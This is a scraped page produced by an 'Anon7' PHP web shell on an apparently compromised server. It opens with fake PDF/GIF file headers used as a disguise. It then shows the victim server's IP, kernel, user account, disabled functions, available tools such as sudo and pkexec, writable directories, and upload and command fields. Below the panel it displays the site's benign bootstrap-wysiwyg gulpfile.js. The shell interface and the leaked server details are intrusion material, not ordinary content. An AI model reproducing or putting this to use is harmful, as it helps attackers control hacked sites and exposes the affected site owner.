%PDF-1.7 GIF89;
ANDA PELER
Server IP : 5.161.254.237  /  Your IP : 216.73.216.242
Web Server : Apache
System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
User : stellasp ( 1131)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/stellasp/public_html/backend/vendors/bootstrap-wysiwyg/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/stellasp/public_html/backend/vendors/bootstrap-wysiwyg/gulpfile.js
// Include gulp
var gulp = require('gulp');

// Include our plugins
var jshint = require('gulp-jshint');
var bootlint = require('gulp-bootlint');
var uglify = require('gulp-uglify');
var rename = require('gulp-rename');
var bootlint = require('gulp-bootlint');
var html5lint = require('gulp-html5-lint');

var checkPages = require('check-pages');

// Default task
gulp.task('default', ['js', 'html', 'bootstrap', 'links', 'minify']);

// Lint our JavaScript files
gulp.task('js', function () {
	return gulp.src('src/**/*.js')
		.pipe(jshint())
		.pipe(jshint.reporter('default'));
});

gulp.task('html', function () {
	return gulp.src(['*.html', 'examples/*.html'])
		.pipe(html5lint());
});

// Lint our Bootstrap files
gulp.task('bootstrap', function () {
	return gulp.src(['*.html', 'examples/**/*.html'])
		.pipe(bootlint());
});

// Check for broken and invalid links in the web pages
gulp.task('links', function (callback) {
	var options = {
		pageUrls: [
			'index.html',
			'examples/basic.html',
			'examples/clear-formatting.html',
			'examples/events.html',
			'examples/form-post.html',
			'examples/formatblock-example.html',
			'examples/html-editor.html',
			'examples/multiple-editors.html',
			'examples/simple-toolbar.html'
		],
		checkLinks: true,
		summary: true
	};

	checkPages(console, options, callback);
});

// Minify our JS
gulp.task('minify', function () {
    return gulp.src('src/*.js')
		.pipe(uglify())
        .pipe(rename('bootstrap-wysiwyg.min.js'))
        .pipe(gulp.dest('js'));
});

// Watch files for changes
gulp.task('watch', function () {
    gulp.watch(['src/*.js', 'index.html', 'examples/*.html'], ['js', 'html', 'bootstrap', 'links', 'minify']);
});

Anon7 - 2022
SCDN GOK